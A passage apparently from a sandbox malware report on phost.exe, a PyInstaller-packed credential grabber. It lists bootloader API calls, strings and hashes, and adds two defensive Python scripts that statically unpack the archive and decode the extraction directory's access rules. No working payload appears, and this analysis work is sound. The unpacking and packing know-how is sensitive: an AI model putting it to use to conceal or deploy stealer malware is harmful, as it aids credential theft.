• Opcode Fuzzy Hash: 5203fde90a14cfca52878d148793ed0f56fa2f4a03ba52266beea290f2c18543
• Instruction Fuzzy Hash: C851D832B0864285EE619B19AC503BA62B5FF85BB4F444235ED4DCBBC9DE3CE509D701
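The strings in the four function entries above (the "MEI" cookie, "Could not read full TOC!", the "Failed to extract %s" family, "_MEI%d" built from GetTempPathW and GetCurrentProcessId, and "inflateInit()" with the zlib version "1.3.1") are the PyInstaller bootloader's own messages: at run time it locates the archive cookie at the end of its executable, reads the table of contents, inflates each entry into %TEMP%\_MEI<pid>, and only then starts Python on the embedded script. The same archive can be parsed statically, which is how a triager recovers the grabber script without executing phost.exe. The following script is an added example written for this report; it is neither Joe Sandbox's nor PyInstaller's code. The cookie and TOC layouts are the PyInstaller bootloader's as understood by the editor, the sample archive, its entry names ("pyiboot01_bootstrap", "phost", "libcrypto-3.dll") and the Python version in the cookie are constructed so the script runs offline, and the error messages are borrowed from the report's strings to show where each check sits.

```python
"""Static parser for the PyInstaller CArchive a bootloader unpacks at run time.
Added example, not code from the sandbox report or from PyInstaller.
The sample archive built below is constructed in memory for the demonstration."""
import struct
import zlib

MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"          # cookie magic; only "MEI" is printable
COOKIE_FMT = "!8sIIii64s"                  # magic, pkg len, TOC offset, TOC len, pyver, python lib name
COOKIE_LEN = struct.calcsize(COOKIE_FMT)   # 88 bytes, big-endian
ENTRY_FMT = "!iIIIBc"                      # structlen, pos, len, ulen, cflag, typcd
ENTRY_LEN = struct.calcsize(ENTRY_FMT)     # 18 bytes, followed by the NUL-padded name


class ArchiveError(Exception):
    pass


def find_cookie(blob: bytes) -> int:
    """Offset of the cookie: scan from the end of the file, as the loader does."""
    pos = blob.rfind(MAGIC)
    if pos < 0 or pos + COOKIE_LEN > len(blob):
        raise ArchiveError("Failed to read cookie!")
    return pos


def parse_archive(blob: bytes) -> dict:
    """Return {entry name: (type code, decompressed bytes)} for every TOC entry."""
    cookie_pos = find_cookie(blob)
    _magic, pkg_len, toc_off, toc_len, _pyver, _pylib = struct.unpack_from(COOKIE_FMT, blob, cookie_pos)
    # The package begins pkg_len bytes before the end of the cookie; TOC and
    # data offsets are relative to that point, not to the start of the PE.
    pkg_start = cookie_pos + COOKIE_LEN - pkg_len
    if pkg_start < 0:
        raise ArchiveError("package start lies before the start of the file")
    toc = blob[pkg_start + toc_off : pkg_start + toc_off + toc_len]
    if len(toc) != toc_len:
        raise ArchiveError("Could not read full TOC!")
    entries, off = {}, 0
    while off < toc_len:
        structlen, pos, dlen, ulen, cflag, typcd = struct.unpack_from(ENTRY_FMT, toc, off)
        if structlen < ENTRY_LEN + 1:           # header plus at least a NUL name
            raise ArchiveError("malformed TOC entry")
        name = toc[off + ENTRY_LEN : off + structlen].split(b"\0", 1)[0].decode()
        data = blob[pkg_start + pos : pkg_start + pos + dlen]
        if len(data) != dlen:
            raise ArchiveError(f"Failed to extract {name}: failed to read data chunk!")
        if cflag:                               # the loader runs inflateInit()/inflate() here
            data = zlib.decompress(data)
            if len(data) != ulen:
                raise ArchiveError(f"Failed to extract {name}: decompressed length mismatch")
        entries[name] = (typcd.decode(), data)
        off += structlen                        # advance by the entry's own structlen
    return entries


def build_archive(files, pyver=312, pylib=b"python312.dll", prefix=b"") -> bytes:
    """Constructed sample: data blobs, then the TOC, then the cookie, appended
    after an arbitrary prefix that stands in for the bootloader PE."""
    data, toc = bytearray(), bytearray()
    for name, typcd, payload, compress in files:
        blob = zlib.compress(payload) if compress else payload
        nm = name.encode() + b"\0"
        structlen = ENTRY_LEN + len(nm)
        structlen += (-structlen) % 16          # each entry is padded to 16 bytes
        toc += struct.pack(ENTRY_FMT, structlen, len(data), len(blob), len(payload),
                           int(compress), typcd.encode())
        toc += nm.ljust(structlen - ENTRY_LEN, b"\0")
        data += blob
    pkg_len = len(data) + len(toc) + COOKIE_LEN
    cookie = struct.pack(COOKIE_FMT, MAGIC, pkg_len, len(data), len(toc), pyver, pylib)
    return prefix + bytes(data) + bytes(toc) + cookie


# Constructed sample archive; the names and contents are placeholders.
SAMPLE = build_archive(
    [("pyiboot01_bootstrap", "s", b"import sys\nprint('boot')\n", True),
     ("phost", "s", b"import os\n# constructed stand-in for the grabber script\n", True),
     ("libcrypto-3.dll", "b", b"MZ\x90\x00" + b"\x00" * 60, False)],
    prefix=b"MZ" + b"\x00" * 200,
)


def script_entries(blob: bytes = SAMPLE) -> list:
    """Names of type 's' entries: the Python scripts a triager pulls out first."""
    return sorted(n for n, (t, _) in parse_archive(blob).items() if t == "s")


if __name__ == "__main__":
    for name, (typcd, body) in parse_archive(SAMPLE).items():
        print(f"{typcd} {name:24s} {len(body)} bytes")
```

Feed the whole executable to parse_archive, not a carved overlay: the loader computes every offset from the cookie backwards, so the prefix length is irrelevant but the cookie must be at the end. In a real build the 's' entries hold marshalled code objects rather than source text, so decompiling them requires the Python version recorded in the cookie's pyver field.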

Control-flow Graph
APIs
• FreeLibrary.KERNEL32(?,?,?,00007FF62CC8F11A,?,?,-00000018,00007FF62CC8ADC3,?,?,?,00007FF62CC8ACBA,?,?,?,00007FF62CC85FAE), ref: 00007FF62CC8EEFC
• GetProcAddress.KERNEL32(?,?,?,00007FF62CC8F11A,?,?,-00000018,00007FF62CC8ADC3,?,?,?,00007FF62CC8ACBA,?,?,?,00007FF62CC85FAE), ref: 00007FF62CC8EF08
Strings
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                              • API String ID: 3013587201-537541572
                                                                                                                                                                                                                              • Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                              • Instruction ID: ba84b8ed72b7d6acf3bd2c08ec4217b2942624cd64973867c96c84c2aeef3cd7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F4114A5B19A5282FF16CB1A9C1497622B1BF49BF0F884239ED1DC7384EF3CE4058342

                                                                                                                                                                                                                              Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(?,00007FF62CC73804), ref: 00007FF62CC736E1
• GetLastError.KERNEL32(?,00007FF62CC73804), ref: 00007FF62CC736EB
  • Part of subcall function 00007FF62CC72C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF62CC73706,?,00007FF62CC73804), ref: 00007FF62CC72C9E
  • Part of subcall function 00007FF62CC72C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF62CC73706,?,00007FF62CC73804), ref: 00007FF62CC72D63
  • Part of subcall function 00007FF62CC72C50: MessageBoxW.USER32 ref: 00007FF62CC72D99
Strings
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
• String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
• API String ID: 3187769757-2863816727
• Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
• Instruction ID: b956c5c0559a42c694c9bc162a435fcaa0ce6a7cf8795c578b551813880ac6c6
• Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
• Instruction Fuzzy Hash: 8821A7A1F1CA4291FE20972CEC553B62274FF883B8F844136E55DCA5D5EE2CE509D302

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
• Instruction ID: 7c077e2aff5f63cf7d231dc390abb066b8caf8f986de67185a38806eb2660584
• Opcode Fuzzy Hash: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
• Instruction Fuzzy Hash: CAC1C432B0C68695EF628B199C60ABF6770EB81BE0F554235EA4D83795CF7CE8458312

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID:
• API String ID: 995526605-0
• Opcode ID: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
• Instruction ID: c166246b85d03a646761b3896349f19c8ff6b633cd934497a3b87f2dd3d656c6
• Opcode Fuzzy Hash: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
• Instruction Fuzzy Hash: 4F215E31B0CA4282EF109B59F85423AA7B4FF857B4F104235EAAD87AE5DE7CD4498701

Control-flow Graph

APIs
  • Part of subcall function 00007FF62CC78760: GetCurrentProcess.KERNEL32 ref: 00007FF62CC78780
  • Part of subcall function 00007FF62CC78760: OpenProcessToken.ADVAPI32 ref: 00007FF62CC78793
  • Part of subcall function 00007FF62CC78760: GetTokenInformation.KERNELBASE ref: 00007FF62CC787B8
  • Part of subcall function 00007FF62CC78760: GetLastError.KERNEL32 ref: 00007FF62CC787C2
  • Part of subcall function 00007FF62CC78760: GetTokenInformation.KERNELBASE ref: 00007FF62CC78802
  • Part of subcall function 00007FF62CC78760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF62CC7881E
  • Part of subcall function 00007FF62CC78760: CloseHandle.KERNEL32 ref: 00007FF62CC78836
• LocalFree.KERNEL32(?,00007FF62CC73C55), ref: 00007FF62CC7916C
• LocalFree.KERNEL32(?,00007FF62CC73C55), ref: 00007FF62CC79175
Strings
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
• API String ID: 6828938-1529539262
• Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
• Instruction ID: 5e4798eeac2ffc8ab57c50db14f613c81a7e613efd7e0007e22eed7f2adb0230
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57213C21B08A8282FE14AB15ED152FA6378EF887A0F444035EA4DD7796DF3CE949D742
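The String ID line of this function carries two SDDL DACL templates, the well-known SID S-1-3-4 (OWNER RIGHTS) and a PYI_PATH_MAX error string, which is the PyInstaller bootloader code that restricts its extraction directory to the invoking user rather than anything the stealer payload does itself. The example below is added here and is not code from the sample, from Joe Sandbox or from PyInstaller: it fills the templates the way a C snprintf would, parses each ACE, names the well-known SIDs, and reports any principal granted access beyond the ones expected. USER_SID is a constructed value, and feeding S-1-3-4 into the second placeholder is an assumption drawn only from the two strings sitting together in the binary.

```python
"""Decode the SDDL DACL templates recovered from phost.exe (String ID line above).

Added example, not code from the sample, Joe Sandbox or PyInstaller. USER_SID
and the pairing of the second '%s' with S-1-3-4 are assumptions for illustration.
"""
import re

# Subset of well-known SIDs sufficient for the strings on this page.
WELL_KNOWN_SIDS = {
    "S-1-3-4": "OWNER RIGHTS",
    "S-1-1-0": "Everyone",
    "S-1-5-18": "NT AUTHORITY\\SYSTEM",
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-545": "BUILTIN\\Users",
}
ACE_TYPES = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED", "AU": "SYSTEM_AUDIT"}
# SDDL rights abbreviations -> (name, access mask); FA is a superset of FR, FW and FX.
RIGHTS = {
    "FA": ("FILE_ALL_ACCESS", 0x001F01FF),
    "FR": ("FILE_GENERIC_READ", 0x00120089),
    "FW": ("FILE_GENERIC_WRITE", 0x00120116),
    "FX": ("FILE_GENERIC_EXECUTE", 0x001200A0),
    "GA": ("GENERIC_ALL", 0x10000000),
    "GR": ("GENERIC_READ", 0x80000000),
    "GW": ("GENERIC_WRITE", 0x40000000),
    "GX": ("GENERIC_EXECUTE", 0x20000000),
}
ACE_RE = re.compile(r"\(([^()]*)\)")

# Constructed SID standing in for the running user's SID.
USER_SID = "S-1-5-21-1004336348-1177238915-682003330-1001"


def parse_rights(field):
    """Return (mask, names) for an SDDL rights field given as hex or as concatenated codes."""
    if field.lower().startswith("0x"):
        mask = int(field, 16)
        return mask, [name for name, bits in RIGHTS.values() if mask & bits == bits]
    if not field or len(field) % 2:
        raise ValueError(f"malformed rights field {field!r}")
    mask, names = 0, []
    for i in range(0, len(field), 2):
        code = field[i:i + 2]
        if code not in RIGHTS:
            raise ValueError(f"unknown rights code {code!r}")
        name, bits = RIGHTS[code]
        mask |= bits
        names.append(name)
    return mask, names


def parse_ace(body):
    """Parse one 'type;flags;rights;objguid;inhguid;sid' ACE body (parentheses stripped)."""
    fields = body.split(";")
    if len(fields) != 6:
        raise ValueError(f"ACE needs six ';'-separated fields: {body!r}")
    ace_type, ace_flags, rights, _obj_guid, _inh_guid, sid = fields
    if ace_type not in ACE_TYPES:
        raise ValueError(f"unsupported ACE type {ace_type!r}")
    mask, names = parse_rights(rights)
    return {"type": ACE_TYPES[ace_type], "flags": ace_flags, "mask": mask,
            "rights": names, "sid": sid, "account": WELL_KNOWN_SIDS.get(sid, sid)}


def parse_dacl(sddl):
    """Parse a 'D:[P|AI|AR](ace)(ace)...' string; owner/group/SACL parts are not handled."""
    if not sddl.startswith("D:"):
        raise ValueError("expected a DACL ('D:') string")
    flags, _, _ = sddl[2:].partition("(")
    if re.fullmatch(r"(P|AI|AR)*", flags) is None:
        raise ValueError(f"bad DACL control flags {flags!r}")
    aces = [parse_ace(a) for a in ACE_RE.findall(sddl[2 + len(flags):])]
    return {"protected": "P" in flags, "aces": aces}


def render_template(template, sids):
    """Fill the bootloader's '%s' placeholders the way its snprintf call would."""
    if template.count("%s") != len(sids):
        raise ValueError("placeholder count does not match the SIDs supplied")
    return template % tuple(sids)


def foreign_principals(dacl, expected_sids):
    """SIDs granted access that are not in expected_sids; non-empty means the
    directory is open to more than the intended principals."""
    return [ace["sid"] for ace in dacl["aces"]
            if ace["type"] == "ACCESS_ALLOWED" and ace["sid"] not in expected_sids]


if __name__ == "__main__":
    sddl = render_template("D:(A;;FA;;;%s)(A;;FA;;;%s)", [USER_SID, "S-1-3-4"])
    for ace in parse_dacl(sddl)["aces"]:
        print(f"{ace['type']:<14} {ace['account']:<48} {ace['mask']:#010x} {','.join(ace['rights'])}")
```

The point of `foreign_principals` is triage: a packed sample that really does restrict its `_MEI` directory to the user and OWNER RIGHTS yields an empty list, whereas a DACL that also names S-1-1-0 or BUILTIN\Users would leave the extracted payload readable by other local accounts.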

Control-flow Graph
(Rendered as an image in the original report; legend: Executed / Not Executed. Recoverable from the node list: basic blocks span 7ff62cc8cfd0 to 7ff62cc8d2d5, with calls to WriteFile, GetConsoleMode and GetLastError.)
APIs
• GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62CC8CFBB), ref: 00007FF62CC8D0EC
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62CC8CFBB), ref: 00007FF62CC8D177
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
• API String ID: 953036326-0
• Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
• Instruction ID: 77335aec0e42fd1705b22e2900202b89684c68aab3852969dafa40764a352c3d
• Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
• Instruction Fuzzy Hash: 0B919472F1865295FB519F699C40ABE2BB0AF44BE8F144239DE0ED7685DF38D4828701
APIs
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: CloseCreateFileHandle_invalid_parameter_noinfo
• String ID:
• API String ID: 1279662727-0
• Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
• Instruction ID: 271a94c00b644a4ab053a53586846c446c36e41e32e8fdcb754450a43629838b
• Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
• Instruction Fuzzy Hash: B941A222F2878283FB11CB64995077A6271FB957B4F109335EA5C83AD6DFBCA5E08701
APIs
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
• String ID:
• API String ID: 3251591375-0
• Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
• Instruction ID: 8b79717dbfe36037813a08f35e9a0aef6439a820653bdf8024acb8f381f60797
• Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
• Instruction Fuzzy Hash: 95315920F08A5346FE24AB2CDD253B916B9EF517A4F444434E54ECF2D7DE2CA409E253
APIs
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
• Instruction ID: 7c5e636b1f99b1f3289bb900d05f14083dc29493701ffd36ec12ef4c19b37575
• Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
• Instruction Fuzzy Hash: C9D09E20B0874652EF697B785CAD4F912716F48BA5F145578C80FC6393DD6CE4898302
APIs
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
• Instruction ID: bea6f2979c97292ab5e279b5dbc5d2ad7b6025bd81adf42ae9bfc8ac724a672c
• Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
• Instruction Fuzzy Hash: 2B51B461B0964286FF6A9A6D9C00E7B62A1AF44BF4F148734DE6DC77C5CF3CE4018642
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                              • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                              • Instruction ID: 9ee7cf53e83f83ff636c49a0e447475e1a33ff4bcac3591da54af4149936f7ac
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C119171718A8181DE618B29EC5416A6371BB85BF4F544331EE7D8B7E9CE7CD0518701
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,?,?,00007FF62CC92D92,?,?,?,00007FF62CC92DCF,?,?,00000000,00007FF62CC93295,?,?,?,00007FF62CC931C7), ref: 00007FF62CC8A9CE
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF62CC92D92,?,?,?,00007FF62CC92DCF,?,?,00000000,00007FF62CC93295,?,?,?,00007FF62CC931C7), ref: 00007FF62CC8A9D8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                                                                              • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                              • Instruction ID: 88a097576592780916cce2bdbbfb4a633a96d504a379eecfbb912931ba418a9a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
